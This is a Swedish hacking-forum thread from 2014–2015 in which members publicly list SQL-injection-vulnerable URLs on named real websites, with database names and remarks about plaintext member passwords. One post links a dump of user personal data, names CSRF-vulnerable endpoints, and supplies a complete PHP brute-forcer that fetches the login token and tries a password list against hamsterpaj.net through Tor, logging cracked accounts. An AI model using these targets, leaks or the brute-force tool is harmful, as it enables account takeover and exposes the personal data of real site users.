Vinnaren i pepparkakshustävlingen!
2014-10-02, 19:58
  #4477
Medlem
http://www.prisjakt.nu/extern/annons..._script_target

Parameter: id
MySQL > 5.0.11 AND time-based blind
  • available databases [1]:
  • prisjakt_nyaprisjakt
Citera
2014-10-02, 20:31
  #4478
Medlem
Citat:
Ursprungligen postat av Hanna94
Kan väl vara spännande antar jag, är det bara emails eller är det användarnamn och lösenord också?
Hur många användare har sidan nu för tiden? Trodde den gått samma öde tillmötes som Lunarstorm.


Mja dom har UID som går över en miljon men tror inte dom har så många användare. Det verkar vara rätt så aktivt dock.

Finns tyvärr inga lösenord.


username,reg_ip, last_ip, reg, age, postnumber, gender, aliases, epost

https://anonfiles.com/file/ca0883376...1d40366d68e603

Finns även CSRF sårbarheter på

http://www.hamsterpaj.net/installningar/flagga/125 < för att sätta en flagga för ditt konto
http://www.hamsterpaj.net/installnin...tum/0001-11-12 < sätta ett födelsedatum

Gjorde även en liten trevlig brute forcer i PHP

Kod:
<?php 

	$username = $argv[1];
	echo "Brute Forcing: $username\n";
	$identifer = "cookie_" . rand(1, 1000) . ".txt";
	$load = explode("\n", file_get_contents("passwords.txt"));
	foreach($load as $password) {
		$csrf = "";
		$password = rtrim($password, "\r");
		$ch = curl_init();
		curl_setopt($ch, CURLOPT_URL,"http://www.hamsterpaj.net");
		curl_setopt($ch, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13');
		curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
		curl_setopt($ch, CURLOPT_PROXY, "http://127.0.0.1:9050/");
		curl_setopt($ch, CURLOPT_HEADER, 0);
		curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);		
		curl_setopt( $ch, CURLOPT_COOKIESESSION, true );
		curl_setopt( $ch, CURLOPT_COOKIEJAR, $identifer );
		curl_setopt( $ch, CURLOPT_COOKIEFILE, $identifer );
		$result = curl_exec ($ch);
		$doc = new DOMDocument;
		@$doc->loadhtml($result);
		$xpath = new DOMXpath($doc);
		  foreach($xpath->query('//form[@action="/logga_in"]//input[@name="csrf_token"]') as $eInput) {
			  $csrf = $eInput->getAttribute('value');
		  }
		  if(empty($csrf)) {
			echo "Can't get the CSRF Key!!\n";
			if(strpos($result, "blivit blockerad")!==false) {
				echo "We've gotten IP blocked.\n";
				die();
			}
			file_put_contents("debug.html", $result);
		  } else {
			curl_setopt($ch, CURLOPT_URL,"http://www.hamsterpaj.net/logga_in");
			curl_setopt($ch, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13');
			curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
			curl_setopt($ch, CURLOPT_PROXY, "http://127.0.0.1:9050/");
			curl_setopt($ch, CURLOPT_HEADER, 0);
			curl_setopt($ch, CURLOPT_COOKIEFILE, $identifer );
			curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);		
			curl_setopt($ch, CURLOPT_POST, true);
							curl_setopt(
								$ch,
								CURLOPT_POSTFIELDS,
								array(
								  'csrf_token' => $csrf,
								  'username' => $username,
								  'password' => $password,
								  'login_position' => 'ui_header',			  
								  'referer' => '/'
								  ));
			$login = curl_exec ($ch);
			curl_setopt($ch, CURLOPT_URL,"http://www.hamsterpaj.net");
			curl_setopt($ch, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13');
			curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
			curl_setopt($ch, CURLOPT_PROXY, "http://127.0.0.1:9050/");
			curl_setopt($ch, CURLOPT_HEADER, 0);
			curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);		
			curl_setopt( $ch, CURLOPT_COOKIEFILE, $identifer );
			$new = curl_exec ($ch);		
			if(strpos($new, "/logga_ut")!==false) {
				echo "]+} Successfully hacked $username:$password\n";			
				file_put_contents("hacked.txt", "$username:$password\n");
				break;
			} else {
				echo "[-] FAIL: '$password'\n";
			}
			curl_close($ch);
		}
	}
	
?>
__________________
Senast redigerad av Andreas1989 2014-10-02 kl. 20:35.
Citera
2014-10-08, 15:30
  #4479
Medlem
http://www.backpacking.se/ViewAllDia...TravelId=32691

MySQL > 5.0.11 AND time-based blind
  • available databases [3]:
  • backpacking_live
  • information_schema
  • test

ser ut att vara 53838 members med klartext lösen
Citera
2014-10-08, 19:26
  #4480
Medlem
Citat:
Ursprungligen postat av butkus

ser ut att vara 53838 members med klartext lösen

Ja den vore kul att ha.
Citera
2014-10-11, 12:45
  #4481
Medlem
http://www.poppius.se/index.phtml?id=30

MySQL UNION query (NULL) - 24 columns

available databases [53]

http://pastebin.com/Vt0egQEs
Citera
2014-10-14, 18:23
  #4482
Medlem
Pyromannens avatar
http://miiswap.klustr.net/recension.php?id=2
  • MySQL >=5
  • Database: klustr_net

50 Members, lösenorden är hashade på något sätt.
Citera
2014-10-14, 18:27
  #4483
Medlem
Pyromannens avatar
http://gb.joakimwebb.se/?id=18383
  • Integer
  • Database: wis1703-2
Citera
2014-10-17, 19:30
  #4484
Medlem
Nytt-kontos avatar
http://forum.svartgul.se/GUESTBOOK/o...sage_id=934690 sqli
Citera
2014-10-22, 12:15
  #4485
Medlem
Citat:
Ursprungligen postat av butkus
http://www.backpacking.se/ViewAllDia...TravelId=32691

MySQL > 5.0.11 AND time-based blind
  • available databases [3]:
  • backpacking_live
  • information_schema
  • test

ser ut att vara 53838 members med klartext lösen


Någon som hämtat hem denna än?
Citera
2015-01-17, 21:11
  #4486
Medlem
https://piratehub.net/search?q=2014'
Citera
2015-01-17, 22:53
  #4487
Medlem
Citat:
Ursprungligen postat av Nytt-konto
http://forum.svartgul.se/GUESTBOOK/o...sage_id=934690 sqli

Ta gärna ner den sidan.
Citera
2015-02-14, 13:35
  #4488
Medlem
http://www.soderdack.se

DB: Soderdack
  • customers
  • news
  • pages
Citera

Stöd Flashback

Flashback finansieras genom donationer från våra medlemmar och besökare. Det är med hjälp av dig vi kan fortsätta erbjuda en fri samhällsdebatt. Tack för ditt stöd!

Stöd Flashback